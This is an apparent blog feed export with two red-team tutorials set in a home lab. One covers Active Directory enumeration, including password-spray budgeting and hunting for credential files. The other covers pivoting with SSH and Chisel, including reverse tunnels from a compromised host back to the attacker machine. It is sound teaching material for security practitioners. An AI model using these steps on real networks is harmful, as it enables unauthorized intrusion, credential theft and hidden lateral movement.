For a broader perspective, LDAP (Lightweight Directory Access Protocol) proves invaluable. Using `windapsearch` with the metadata module, we can obtain a comprehensive overview of the domain:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m metadata

```

![](/content/images/2023/10/image-75.png)

Domain Metadata

This command allows us to delve into the domain&apos;s metadata, offering insights that might be overlooked by standard enumeration tools. Further, the flexibility of `windapsearch` is evident in its ability to filter results based on specific attributes, enhancing the efficiency and focus of our enumeration efforts.

![](/content/images/2023/10/image-79.png)

Module help

![](/content/images/2023/10/image-80.png)

Use of &quot;attrs&quot;

## Exploring Security Policies with PowerView

The password policy in an Active Directory domain is a critical aspect of security, and PowerView offers an efficient way to examine these policies. It&apos;s particularly useful when considering brute force attacks, as a robust password policy can be a significant barrier against such attempts. With PowerView, we can gain detailed insights into these policies using the command:

```powershell
(Get-DomainPolicy).&quot;SystemAccess&quot;
```

![](/content/images/2023/10/image-83.png)
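When weighing a password spray against this policy, the lockout values translate directly into an attempt budget. A minimal sketch using the field names the SystemAccess section exposes (the values here are invented):

```python
# Sketch: turning SystemAccess policy values into a password-spray budget.
# Field names match the secedit "System Access" section returned by
# (Get-DomainPolicy)."SystemAccess"; the values are invented.
policy = {
    "MinimumPasswordLength": 7,
    "LockoutBadCount": 5,      # 0 means accounts never lock out
    "ResetLockoutCount": 30,   # minutes until the bad-password counter resets
}

def spray_attempts(p: dict, margin: int = 2) -> int:
    """Attempts per reset window, keeping a safety margin below lockout."""
    if p["LockoutBadCount"] == 0:
        return -1  # no lockout policy: effectively unlimited attempts
    return max(p["LockoutBadCount"] - margin, 0)

print(spray_attempts(policy))
```

The safety margin matters because legitimate user typos also consume bad-password counts; staying two attempts under the threshold avoids locking out the whole domain.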

Moreover, PowerView enables us to access the configuration of Kerberos tickets, a key element in managing authentication in Active Directory. Understanding Kerberos configuration is essential as it can reveal vulnerabilities or key security practices. To check this configuration, we use:

```powershell
(Get-DomainPolicy).&quot;KerberosPolicy&quot;
```

![](/content/images/2023/10/image-31.png)

Kerberos policy

## Uncovering Domain Controller Details with PowerView

In the realm of Active Directory, Domain Controllers play a pivotal role, and understanding their configuration is vital. PowerView offers a simple yet effective means to retrieve detailed information about these controllers. Crucial details such as the operating system version are particularly important as older versions might be susceptible to well-known vulnerabilities like EternalBlue. This information can be obtained using the command:

```powershell
 Get-DomainController 
```

![](/content/images/2023/10/image-32.png)

Obtain domain controller information

For environments with numerous domain controllers, where a concise overview is needed, PowerView allows us to streamline the output. By using the command below, we can focus on just the names of the controllers, providing a clear and succinct view:

```powershell
Get-DomainController | select name
```

![](/content/images/2023/10/image-33.png)

Filter for viewing domain controllers

## Navigating Domain User Enumeration with PowerView and Windapsearch

Enumerating domain users is a critical step in understanding the landscape of an Active Directory environment. PowerView simplifies this process, offering commands that enable detailed insights into user accounts. The command `Get-DomainUser` can be employed to list all domain users, and for a more tailored output, the following command can be used:

```powershell
Get-DomainUser
```

![](/content/images/2023/10/image-34.png)

Get Domain users

```powershell
Get-DomainUser | select cn,distinguishedname
```

![](/content/images/2023/10/image-36.png)

Filter user information

For an in-depth view of specific users, PowerView allows us to extract various properties such as creation dates, security identifiers (SIDs), and password policies:

```powershell
Get-DomainUser -Identity &lt;username&gt;
```

![](/content/images/2023/10/image-37.png)

&lt;details&gt;
&lt;summary&gt;Filter by a specific user&lt;/summary&gt;

```powershell
Get-DomainUser -Identity &lt;username&gt; -Properties DisplayName, MemberOf,objectsid,useraccountcontrol | Format-List
```
&lt;/details&gt;


![](/content/images/2023/10/image-38.png)

Filter information of interest

Windapsearch complements these PowerShell functionalities by enabling remote LDAP enumeration of domain users:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m users

```

![](/content/images/2023/10/image-73.png)

Obtaining all users

Moreover, Windapsearch is invaluable for identifying user accounts susceptible to Kerberoasting attacks:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m user-spns
```

![](/content/images/2023/10/image-74.png)

Obtaining users with service accounts

## Exploring Domain Computers: PowerView and LDAP Approaches

Unveiling the landscape of domain computers is a crucial step in Active Directory enumeration. PowerView provides the means to not only list these computers but also delve into their operating systems, revealing potential vulnerabilities:

&lt;details&gt;
&lt;summary&gt;To list the computers visually:&lt;/summary&gt;

```powershell
Get-NetComputer | select name
```
&lt;/details&gt;


![](/content/images/2023/10/image-39.png)

Filter computers

To identify computers running specific versions of Windows, such as Server 2016, PowerView offers a detailed command:

```powershell
Get-NetComputer -OperatingSystem &quot;*Server 2016*&quot; | select name,operatingsystem | Format-List
```

![](/content/images/2023/10/image-40.png)

Filter by operating system

Complementing PowerView&apos;s capabilities, LDAP queries through Windapsearch enable enumeration of domain computers, providing an alternative approach:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m computers

```

![](/content/images/2023/10/image-72.png)

Getting machines from LDAP

## Mastering Group Enumeration

Exploring group dynamics within Active Directory is pivotal for understanding privilege escalation avenues. In upcoming chapters, we&apos;ll dive deeper into the intricacies of critical groups. For now, let&apos;s focus on how to enumerate them effectively using PowerView and Windapsearch.

&lt;details&gt;
&lt;summary&gt;To get a comprehensive list of all available groups with PowerView:&lt;/summary&gt;

```powershell
Get-NetGroup | select name
```
&lt;/details&gt;


![](/content/images/2023/10/image-41.png)

List domain groups

For specifics about a particular group, such as &apos;Domain Admins&apos;:

```powershell
Get-NetGroup &apos;Domain Admins&apos;
```

![](/content/images/2023/10/image-42.png)

Filter by group

Using a wildcard, we can filter groups containing the term &apos;admin&apos;:

```powershell
Get-NetGroup &quot;*admin*&quot; | select name
```

![](/content/images/2023/10/image-43.png)

Filter by groups with the word admin

To uncover all members of a specific group like &apos;Domain Admins&apos;:

```powershell
Get-NetGroupMember -GroupName &quot;Domain Admins&quot; -Recurse | select MemberName
```

![](/content/images/2023/10/image-44.png)

Filter by users who are administrators

&lt;details&gt;
&lt;summary&gt;To list all groups within the domain:&lt;/summary&gt;

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m groups

```
&lt;/details&gt;


![](/content/images/2023/10/image-76.png)

Obtaining groups through windapsearch

For a targeted approach to uncover members within the &apos;Domain Admins&apos; group:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m members --group &quot;CN=Domain Admins,OU=Groups,DC=SHADOW,DC=local&quot;

```

![](/content/images/2023/10/image-78.png)

Filter by members of a specific group

## Deciphering Local Group Dynamics in Windows Environments

Delving into the local group structure of Windows machines is a critical step in understanding the security and user management of a system. Here&apos;s how we can methodically enumerate and analyze local groups and their members:

**Listing Local Groups:** To get an overview of all local groups present on a Windows machine, use the following PowerView command:

```powershell
Get-NetLocalGroup | Select-Object GroupName
```

![](/content/images/2023/10/image-45.png)

List local groups

**Examining Group Members:** To understand who belongs to a specific group, such as &apos;Administrators&apos;, use:

```powershell
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
```

This command provides insights into whether the members are users or groups and if they belong to the domain.

![](/content/images/2023/10/image-46.png)

Members of a group

**Investigating User&apos;s Group Affiliations:** To explore the groups a specific user is part of, use:

```powershell
Get-NetGroup -UserName &quot;&lt;username&gt;&quot; | select name
```

![](/content/images/2023/10/image-47.png)

Local groups of a specific user

## Uncovering Shared Network Resources: A Dive into NetShares

Exploring shared network folders is akin to uncovering hidden treasures within a network. These shares often contain sensitive information, crucial backups, and sometimes even forgotten data, ripe for examination. To embark on this exploration in Windows environments, we utilize a powerful tool in our arsenal:

**Identifying Shared Folders:** To list all shared network resources on a Windows machine, the following PowerView command becomes our key:

```powershell
Get-NetShare
```

This command reveals all shared folders, providing a map to potentially valuable or sensitive resources within the network landscape.

![](/content/images/2023/10/image-49.png)

List of shared network folders on the machine

## Sifting Through Files: The Hunt for Compromising Data

In the pursuit of critical information within a network, diving into the sea of files is essential. Among these files, some contain the keys to further access or pivotal data that could lead to compromising other machines. To embark on this digital treasure hunt, a powerful PowerShell script becomes our compass. Run this script in the `C:\Users` directory to unearth files of various formats that may hold valuable secrets:

```powershell
Get-ChildItem -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.ini,*.log,*.xml,*.git* -File -Recurse -ErrorAction SilentlyContinue -Exclude desktop.ini
```

This script meticulously scans for a wide array of file types, from text documents to logs, uncovering potential repositories of sensitive information. It&apos;s a methodical approach to sift through the digital layers, searching for those hidden gems – be it credentials, configuration files, or even inadvertently stored sensitive data. With each discovered file, we inch closer to understanding the network&apos;s secrets and vulnerabilities.
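If you have pulled a directory tree back or mounted a share locally, the same hunt can be reproduced offline. A minimal Python sketch of the filter:

```python
# Sketch: the same file hunt expressed with pathlib, for trees that have
# been exfiltrated or mounted locally.
from pathlib import Path

EXTS = {".txt", ".pdf", ".xls", ".xlsx", ".doc", ".docx",
        ".kdbx", ".ini", ".log", ".xml"}

def interesting_files(root: str) -> list:
    return sorted(
        p for p in Path(root).rglob("*")
        # match by extension, skip the noise desktop.ini generates
        if p.is_file() and p.suffix.lower() in EXTS and p.name.lower() != "desktop.ini"
    )
```

Running the triage offline keeps noisy recursive directory listings off the target host, which matters when stealth is a priority.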

## Navigating Group Policies: A Key to Privilege Escalation

In the intricate maze of Active Directory, Group Policy Objects (GPOs) stand out as crucial elements for lateral movement and privilege escalation. Essentially, GPOs are collections of policy settings that orchestrate the behavior and access rights of users and computers within a Windows network. While we will delve deeper into their significance in upcoming chapters, it&apos;s pivotal to grasp how to unearth these policy gems.

For starters, utilize PowerView&apos;s capabilities to list GPOs with the following commands:

-   `Get-NetGPO` to list all GPOs.
-   `Get-NetGPO | select displayname` for a focused view of GPO names.
-   `Find-GPOComputerAdmin -ComputerName &lt;ComputerName&gt;` to pinpoint admin GPOs for specific computers.

![](/content/images/2023/10/image-50.png)

List all domain GPOs

![](/content/images/2023/10/image-51.png)

Filter by name

![](/content/images/2023/10/image-52.png)

GPOs of a specific machine

Furthermore, to expand your search across the domain&apos;s landscape, employ `windapsearch` with its `gpos` module:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m gpos

```

![](/content/images/2023/10/image-77.png)

## Unraveling Organizational Units: The Blueprint of Active Directory Structure

Picture Organizational Units (OUs) as the intricate compartments of a grand library within the Active Directory (AD) domain. These OUs serve as logical containers in Windows operating systems, methodically organizing and managing various network objects. Imagine them as shelves holding books (users), folders (groups), and gadgets (computers), each classified and arranged for optimal management and access.

Administrators typically harness OUs to implement a structured, hierarchical order in the AD landscape. This structure is not just for orderliness; it&apos;s a strategic tool for applying targeted security policies to specific clusters of network objects. Just as a librarian categorizes books for easy access and to maintain a certain order, administrators use OUs to control and streamline the network environment.

To take a peek into this well-ordered world of OUs, the command `Get-NetOU` is your key. It&apos;s like having a map that guides you through the various sections of this vast library, providing insights into how the AD domain is segmented and governed. In upcoming discussions, we&apos;ll delve deeper into the interplay between OUs and Group Policy Objects (GPOs), unraveling how they collectively sculpt the security and operational framework of the AD domain.

![](/content/images/2023/10/image-53.png)

Obtaining OUs

## Deciphering ACLs: The Gatekeepers of Network Security

Access Control Lists (ACLs) are akin to the intricate security protocols of a high-tech facility. They are sets of rules integral to managing access rights in operating systems, file systems, and network environments. ACLs dictate who gets to access, modify, delete, or perform specific actions on a resource, much like a security guard determines who enters a building.

In the realm of Active Directory (AD), understanding and managing ACLs are crucial for maintaining robust network security. PowerView, a versatile tool in our arsenal, allows us to inspect ACLs associated with different groups. For example, using `Get-ObjectAcl -SamAccountName &quot;&lt;group&gt;&quot; -ResolveGUIDs`, we can unveil the list of ACLs tied to a particular group, uncovering the security permissions vested in it.

![](/content/images/2023/10/image-54.png)

ACLs of a given group

Moreover, determining whether a user can alter a group policy becomes straightforward with `Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}`. This capability is vital in auditing and securing group policy settings.

![](/content/images/2023/10/image-55.png)

See if we can modify a group policy

To dig deeper and find ACLs of particular interest or potential vulnerabilities, `Invoke-ACLScanner -ResolveGUIDs` is our go-to command. It scans and highlights ACLs that might be exploitable for privilege escalation or unauthorized access.

![](/content/images/2023/10/image-56.png)

Finding interesting ACLs
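In practice, interesting usually means one of a handful of abusable rights (GenericAll, WriteDacl, and friends). A small offline sketch that flags them in PowerView-style ACL output (the sample ACEs are invented):

```python
# Sketch: flagging abusable rights in PowerView-style ACL output.
# The right names are the classic abusable set; the sample ACEs are invented.
ABUSABLE = {"GenericAll", "GenericWrite", "WriteDacl",
            "WriteOwner", "AllExtendedRights"}

def abusable_aces(aces: list) -> list:
    hits = []
    for ace in aces:
        # PowerView prints rights as a comma-separated string
        rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
        if not rights.isdisjoint(ABUSABLE):
            hits.append(ace)
    return hits

sample = [
    {"IdentityReference": "SHADOW\\beruinsect",
     "ActiveDirectoryRights": "GenericAll"},
    {"IdentityReference": "SHADOW\\Domain Users",
     "ActiveDirectoryRights": "ReadProperty, ListChildren"},
]
print(abusable_aces(sample))
```

Filtering this way on exported output means one collection pass on the target, with the analysis done from your own machine.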

Investigating ACLs linked to a specific user is also a breeze with `Get-DomainObjectAcl -Identity &lt;user&gt; -ResolveGUIDs`. This function is particularly useful when assessing the access rights and permissions of a user within the AD environment.

![](/content/images/2023/10/image-57.png)

Obtain access control lists for a given user

Lastly, to inspect ACLs applied to a specific folder or file, `Get-PathAcl -Path &quot;\\10.0.0.2\Users&quot;` comes in handy. This helps in understanding the access control set on shared network folders or sensitive files, a crucial aspect of data security.

![](/content/images/2023/10/image-58.png)

Access control lists against a given path

# Navigating the Maze of Active Directory: A Comprehensive Wrap-Up

In this explorative journey, we&apos;ve delved deep into the intricacies of Active Directory enumeration, both through automated means like BloodHound and manual methods utilizing tools like PowerView and windapsearch. We&apos;ve seen how BloodHound, with its graph theory prowess, serves as a compass, guiding us through the complex labyrinth of privilege relationships and revealing paths to escalate our privileges within the domain.

Simultaneously, we embraced the subtler art of manual enumeration, vital in scenarios demanding stealth, using tools like PowerView and windapsearch. This method, though more labor-intensive, equips us with the finesse to operate undetected, a crucial skill in red team operations.

Our exploration didn&apos;t just stop at gathering information; we learned to interpret and utilize it. From scrutinizing domain controllers and user accounts to dissecting groups, policies, and ACLs, we gained insights into the myriad ways each component of an Active Directory environment interacts and influences the other.

As we navigated through this complex network of information and permissions, we uncovered various facets of domain security, from GPOs and OUs to the finer details of local group enumerations and network shares. Each element we encountered and understood brought us closer to mastering the domain environment, teaching us not just how to extract information but also how to use it effectively.

In essence, this chapter has been a comprehensive guide, empowering us with the knowledge and tools to perform thorough and effective Active Directory enumerations. Whether you&apos;re a budding cybersecurity enthusiast or a seasoned professional, the insights and techniques covered here are invaluable assets in your quest to understand and secure Active Directory environments.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;We have covered enumeration with PowerView and windapsearch; however, how can we enumerate domain users with crackmapexec and enum4linux?&lt;/summary&gt;

```bash
crackmapexec smb targets.txt -u &lt;user&gt; -p &lt;pass&gt; --users

```

![](/content/images/2023/10/image-84.png)

```bash
enum4linux -u &lt;user&gt; -p &lt;password&gt; -U &lt;ip&gt;

```

![](/content/images/2023/10/image-85.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Following the above, how can we list the network shared folders and the password policy?&lt;/summary&gt;

&lt;details&gt;
&lt;summary&gt;To list shares:&lt;/summary&gt;

```bash
crackmapexec smb &lt;targets&gt; -u &lt;user&gt; -p &lt;password&gt; --shares

```
&lt;/details&gt;


![](/content/images/2023/10/image-89.png)

```bash
enum4linux -u &lt;user&gt; -p &lt;password&gt; -S &lt;ip&gt;

```

![](/content/images/2023/10/image-86.png)

&lt;details&gt;
&lt;summary&gt;To enumerate the password policy:&lt;/summary&gt;

```bash
crackmapexec smb &lt;targets&gt; -u &lt;user&gt; -p &lt;pass&gt; --pass-pol
```
&lt;/details&gt;


![](/content/images/2023/10/image-88.png)

```bash
enum4linux -u &lt;user&gt; -p &lt;password&gt; -P &lt;ip&gt;

```

![](/content/images/2023/10/image-87.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What can I use BloodHound for, and when should I not use it?&lt;/summary&gt;

I can use it when doing internal infrastructure pentesting or CTFs, where the noise it generates is not a problem. However, in an exercise where I have to stay quiet, I will have to avoid it; otherwise I will be detected quickly.
&lt;/details&gt;

# Resources

[Active Directory Domain Enumeration Part-1 With Powerview](https://nored0x.github.io/red-teaming/active-directory-domain-enumeration-part-1/)

[Active Directory Enumeration - Pentest Everything](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/ad-enumeration)

[GitHub - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Active Directory Pivoting: Advanced Techniques and Tools</title><link>https://www.kayssel.com/post/pivoting-1</link><guid isPermaLink="true">https://www.kayssel.com/post/pivoting-1</guid><description>In this chapter, we explore advanced network pivoting techniques, using tools like Chisel and SSH in a lab setup. We focus on local and remote port forwarding and dynamic port forwarding for practical cybersecurity skills development.</description><pubDate>Sun, 08 Oct 2023 07:35:23 GMT</pubDate><content:encoded># **Welcoming the World of Advanced Network Pivoting**

Hello and welcome to this exciting chapter in our ongoing series dedicated to the fascinating realm of Active Directory! Today, we delve into a crucial aspect of network security and penetration testing: the art of pivoting. But before we dive in, let&apos;s pause for a moment: What exactly is pivoting?

Pivoting is the strategic technique used in cybersecurity to move through a network, leveraging compromised systems as stepping stones to access other parts of the network that were previously unreachable. It&apos;s a critical skill in enterprise environments, where complex network architectures and multiple subnets create both challenges and opportunities for cybersecurity professionals.

In this chapter, we&apos;ll not only discuss the theoretical aspects of pivoting but also put these concepts into practice through a specially curated laboratory setup. This hands-on approach is designed to give you a practical understanding of different pivoting techniques and tools, combining theory with real-world application.

Whether you&apos;re a seasoned security expert or just beginning your journey in cybersecurity, this chapter promises to enrich your skill set with practical knowledge and techniques. From setting up your lab environment to mastering tools like Chisel and exploring SSH and WINRM capabilities, we&apos;ve got you covered.

So, buckle up and prepare to embark on a journey that will take you through the depths of network pivoting, equipping you with the knowledge and skills to navigate and secure complex network environments. Let&apos;s get started on this thrilling adventure into the world of network pivoting!

# Chisel: A Pivoting Powerhouse in Penetration Testing

Chisel, developed with Golang, is a versatile tool that simplifies the process of pivoting during penetration testing. It&apos;s uniquely designed as a fast TCP/UDP tunnel, transported over HTTP and secured via SSH, combining both client and server functionalities in a single executable. This makes it ideal for efficient tunneling of both TCP and UDP traffic through HTTP.

To get started with Chisel, just download the appropriate binary for Windows or Linux from their GitHub releases page. Its dual client-server model positions it as a pivotal tool (pun intended!) in your cybersecurity arsenal. I&apos;ll soon showcase some practical examples demonstrating Chisel&apos;s prowess in pivoting scenarios. Stay tuned for more insights on leveraging this powerful tool!

[Releases · jpillora/chisel](https://github.com/jpillora/chisel/releases)

# Lab Preparation for Pivoting Techniques

Setting up an effective lab environment is crucial for practicing and mastering pivoting techniques in cybersecurity. My recommendation is to start with a well-structured lab, as outlined in the first three chapters of the lab configuration series I&apos;ve provided. Particularly, chapter 3 delves into the specifics of configuring a lab for pivoting exercises.

[Offensive security lab 3. Lab with subnets, firewall and pivot ready](https://www.kayssel.com/post/lab-3/)

![](/content/images/2023/10/image-9.png)

Lab setup

Here&apos;s a high-level overview of the lab setup I&apos;ll be using to demonstrate pivoting:

-   **Kali Linux Machine**: Positioned within the same subnet as the Active Directory domain (192.168.253.0/24), yet outside the internal network. This strategic placement is key for executing pivoting techniques.
-   **Compromised Machine (192.168.253.130)**: We&apos;ll utilize this machine, which we&apos;ve managed to compromise, as a launchpad to access services on another target machine (192.168.254.131). Notably, the &quot;Beru Internal&quot; machine at 192.168.254.131 hosts several services, including a vulnerable web page on port 3000 (JuiceShop).
-   **Enabling SSH and WINRM**: For seamless implementation of pivoting techniques, ensure that SSH and WINRM are enabled on the machine you intend to pivot through. Use the following PowerShell command to enable WINRM:

```powershell
Enable-PSRemoting -SkipNetworkProfileCheck -Force
```

![](/content/images/2023/09/image-30.png)

Enable WINRM

For SSH on Windows machines, follow these steps:

-   Search and open &quot;Settings&quot;.
-   Navigate to &quot;Apps &gt; Apps &amp; features &gt; Optional features&quot;.
-   Click &quot;Add a feature&quot;, find &quot;OpenSSH server&quot;, expand the option, and install it.
-   Finally, activate the SSH server through &quot;Services&quot;.

![](/content/images/2023/09/image-36.png)

Install SSH server

![](/content/images/2023/10/image-10.png)

SSH service

![](/content/images/2023/09/image-38.png)

Start service

By carefully setting up your lab environment as described, you&apos;ll create an ideal testing ground for practicing a range of pivoting techniques, using tools like SSH and Chisel. This setup will not only enhance your understanding of pivoting but also prepare you for more advanced cybersecurity practices.

# Exploring Pivoting Techniques: Local Port Forwarding

Pivoting is a crucial skill in cybersecurity, enabling you to move stealthily within a network. One effective technique is Local Port Forwarding, which involves redirecting traffic from your machine to a specific port on a remote system. Let&apos;s delve into this with practical examples.

## Local Port Forwarding with SSH

![](/content/images/2023/10/image-11.png)

Local port forwarding example

Suppose we&apos;ve gained SSH access to a machine (192.168.253.130) and want to reach a service on another machine (192.168.254.131) at port 3000. We can set up a local port forwarding using SSH with the following command:

```bash
ssh -L &lt;port to be opened on the Kali machine&gt;:&lt;remote machine to be accessed&gt;:&lt;remote port&gt; &lt;user&gt;@&lt;compromised machine&gt;

```

![](/content/images/2023/10/image-5.png)

Local port forwarding with ssh

For instance, to access the service on port 3000 via port 9000 on your machine, you&apos;d use:
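Putting the template above together with our lab addresses, the concrete command would look like this (a sketch; substitute the SSH user you hold on the compromised host):

```bash
# Open port 9000 on the Kali machine and forward it, through the
# compromised machine (192.168.253.130), to port 3000 on the internal host
ssh -L 9000:192.168.254.131:3000 &lt;user&gt;@192.168.253.130
```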

![](/content/images/2023/10/image-4.png)

Access to JuiceShop with local port forwarding

Once set up, you can access the service through `localhost:9000` on your browser.

## Local Port Forwarding with Chisel

Chisel, a more versatile tool, also allows local port forwarding but requires initial setup. First, upload the Chisel binary to the compromised machine, possibly using WINRM. Then set up Chisel in a client-server model.

![](/content/images/2023/10/image-12.png)

Chisel upload via winrm

![](/content/images/2023/10/image-13.png)

Local port forwarding with chisel

**Create a Chisel Server**: On the compromised machine, initiate a Chisel server to listen on a specific port (e.g., 1234).

```powershell
.\chisel_windows.exe server -p 1234

```

![](/content/images/2023/10/image-14.png)

Chisel server on the machine for pivoting

&lt;details&gt;
&lt;summary&gt;Verify the server setup with:&lt;/summary&gt;

```powershell
netstat -ano | Select-String 1234

```
&lt;/details&gt;


![](/content/images/2023/10/image-2.png)

Verification of the open port

**Set Up Chisel Client on Your Machine**: Connect your machine to the Chisel server, specifying local port forwarding rules.

```bash
./chisel_linux client [ServerIP]:1234 9000:192.168.254.131:3000
```

![](/content/images/2023/10/image.png)

Execution of the client

&lt;details&gt;
&lt;summary&gt;Check the port opening on your machine:&lt;/summary&gt;

```bash
netstat -tupln

```
&lt;/details&gt;


![](/content/images/2023/10/image-3.png)

Check of the open port in Kali

**Access the Service**: Open your browser and navigate to `localhost:9000` to access the remote service.

![](/content/images/2023/10/image-4.png)

Access to the service via chisel

# Navigating Networks with Remote Port Forwarding

Remote port forwarding is a pivotal technique in cybersecurity, allowing you to circumvent firewall restrictions and access remote services. Unlike local port forwarding, this method sets up a tunnel from the server (victim machine) to the client (your machine).

## Remote Port Forwarding via SSH

![](/content/images/2023/10/image-15.png)

Remote Port Forwarding diagram

Suppose you want to reach a service on an internal machine through a port on your own machine. Running SSH from the compromised machine back to yours provides a straightforward way to set this up:

```bash
ssh -R [LocalPort]:[TargetMachineIP]:[TargetPort] [Username]@[YourMachine]
```

For instance, if you want to access a service on port 3000 of a target machine via port 8000 on your local machine, the command would be:

```bash
ssh -R 8000:192.168.254.131:3000 user@yourlocalmachine
```

![](/content/images/2023/09/image-35.png)

Remote port forwarding with ssh

This setup is particularly useful for bypassing firewall restrictions that might block direct access to the target service.

## Remote Port Forwarding with Chisel

Chisel offers a more dynamic approach to remote port forwarding. In this scenario, you set up a Chisel server on your local machine (Kali Linux) and a client on the victim machine.

![](/content/images/2023/10/image-17.png)

Remote Port Forwarding diagram

**Create a Chisel Server on Your Machine**: This server will listen for connections from the victim machine.

```bash
chisel_linux server -p [ChiselServerPort] --reverse
```

For example, to start a server on port 1234:

```bash
chisel_linux server -p 1234 --reverse
```

![](/content/images/2023/09/image-34.png)

Example of remote port forwarding with chisel

**Launch Chisel Client on the Victim Machine**: This client connects to your Chisel server and sets up the tunnel.

```bash
chisel_windows.exe client [YourMachineIP]:[ChiselServerPort] R:[LocalPort]:[TargetMachineIP]:[TargetPort]
```

&lt;details&gt;
&lt;summary&gt;For instance:&lt;/summary&gt;

```bash
chisel_windows.exe client yourmachineip:1234 R:8000:192.168.254.131:3000
```
&lt;/details&gt;


**Access the Target Service**: Once the tunnel is established, you can access the target service on your local port (8000 in this case).

![](/content/images/2023/09/image-33.png)

Service access

# Harnessing Dynamic Port Forwarding for Network Flexibility

Dynamic port forwarding is a versatile technique in cybersecurity, enabling access to multiple network services simultaneously without specifying each one. It&apos;s especially valuable for accessing various services within a network segment that was previously unreachable.

## Local Dynamic Port Forwarding with SSH

![](/content/images/2023/10/image-19.png)

Local dynamic port forwarding diagram

Local dynamic port forwarding establishes a SOCKS proxy server on a specified local port, allowing applications to redirect their network traffic through this proxy. This proxy can facilitate connections from a compromised entry point to other inaccessible systems or segments.

**Create a SOCKS Proxy Server**:

```bash
ssh -D 1080 [Username]@[PivotingMachineIP]
```

![](/content/images/2023/10/image-6.png)

Local dynamic port forwarding with ssh

**Configure Proxychains**: Modify `/etc/proxychains4.conf` to tunnel traffic from port 1080.

```bash
sudo nvim /etc/proxychains4.conf

```

Uncomment the necessary lines to activate the SOCKS proxy.
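On a default Kali install this boils down to the tail of the ProxyList section; a sketch of the relevant line (the rest of the file can stay as shipped):

```bash
# /etc/proxychains4.conf — [ProxyList] section
# Send traffic through the SSH dynamic forward listening on local port 1080
socks5 127.0.0.1 1080
```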

![](/content/images/2023/10/image-20.png)

Proxychains configuration

**Accessing Services**: With Proxychains configured, you can use it to access various services:

&lt;details&gt;
&lt;summary&gt;Access an HTTP service:&lt;/summary&gt;

```bash
proxychains firefox 

```
&lt;/details&gt;


![](/content/images/2023/09/image-40.png)

Access to JuiceShop

Access SSH service on internal machines.
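For instance, to reach SSH on the internal host through the proxy (username illustrative):

```bash
proxychains ssh &lt;user&gt;@192.168.254.131
```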

![](/content/images/2023/10/image-22.png)

Ssh access from internal machine

To access services on the pivoting machine, refer to `127.0.0.1`.

![](/content/images/2023/10/image-23.png)

Access to SMB shared folders

**Enumerating Ports with Nmap**: Nmap can be used with Proxychains to enumerate TCP ports on remote machines. For internal machines, a faster option is to use [Naabu](https://github.com/projectdiscovery/naabu), a port scanning tool.
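Because a SOCKS proxy only relays full TCP connections, Nmap needs a connect scan with host discovery disabled; a sketch against the internal machine (port list illustrative):

```bash
# -sT: full-connect scan, required when tunneling through SOCKS
# -Pn: skip ICMP host discovery, which does not traverse the proxy
proxychains nmap -sT -Pn -p 22,80,445,3000 192.168.254.131
```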

![](/content/images/2023/10/image-24.png)

Use of Nmap using proxychains

![](/content/images/2023/10/image-25.png)

Using naabu to enumerate ports

## Local Dynamic Port Forwarding with Chisel

Chisel offers another method for local dynamic port forwarding, requiring a server on the pivot machine and a client on your machine.

![](/content/images/2023/10/image-26.png)

Chisel to local dynamic port forwarding

**Setting up Chisel Server**:

```bash
chisel_windows.exe server -p [ChiselServerPort] --socks5
```

Start the server on the pivot machine.

![](/content/images/2023/10/image-8.png)

Chisel server

**Activating Chisel Client**:

```bash
chisel_linux client [PivotMachineIP]:[ChiselServerPort] [LocalSOCKSPort]:socks
```

![](/content/images/2023/10/image-7.png)

Chisel client

**Using Proxychains with Chisel**: Once Chisel is set up, Proxychains can be used similarly to SSH to access services on the internal network.

# Remote Dynamic Port Forwarding with Chisel

![](/content/images/2023/10/image-27.png)

Remote dynamic port forwarding with chisel

Remote dynamic port forwarding is a pivotal technique in network pivoting, particularly useful when dealing with Windows machines that require administrator permissions for local port forwarding. Chisel, a versatile tool for creating secure network tunnels, is often the go-to choice for this task.

**Server Setup on Kali Machine**:

-   Run Chisel in server mode with the `--reverse` flag to allow reverse connections from the client.
-   The server listens on a specified port (e.g., 1234).
-   Command:

```bash
chisel_linux server -p 1234 --reverse
```

**Client Configuration on Target Machine**:

-   The client connects to the server and specifies the local port for the SOCKS proxy.
-   Command:

```bash
chisel_windows.exe client &lt;ServerIP&gt;:1234 R:&lt;LocalSOCKSPort&gt;:socks
```

![](/content/images/2023/10/image-21.png)

Example of commands

# **Concluding Thoughts: Mastering the Art of Network Pivoting**

As we wrap up this insightful journey into the world of network pivoting, let&apos;s take a moment to appreciate the rich tapestry of techniques and tools we&apos;ve explored. Chisel, a true star in our toolkit, has shown its prowess in tunneling TCP/UDP traffic with remarkable ease, reinforcing its place as a must-have in any cybersecurity enthusiast&apos;s arsenal.

Our dive into the lab setup illuminated the critical role of a well-structured environment. It&apos;s a playground where theories transform into tangible skills, a space where the abstract notions of network security are brought to life.

From the intricacies of local and remote port forwarding to the dynamic realm of SOCKS proxies, we&apos;ve seen how diverse the world of pivoting can be. Each method, with its unique flavor, serves as a testament to the ever-evolving landscape of network security.

Our practical applications using SSH, WINRM, and the versatile Chisel not only bridged the gap between theory and practice but also painted a picture of real-world network navigation. It&apos;s a reminder of the constant dance between offensive and defensive strategies in the cybersecurity realm.

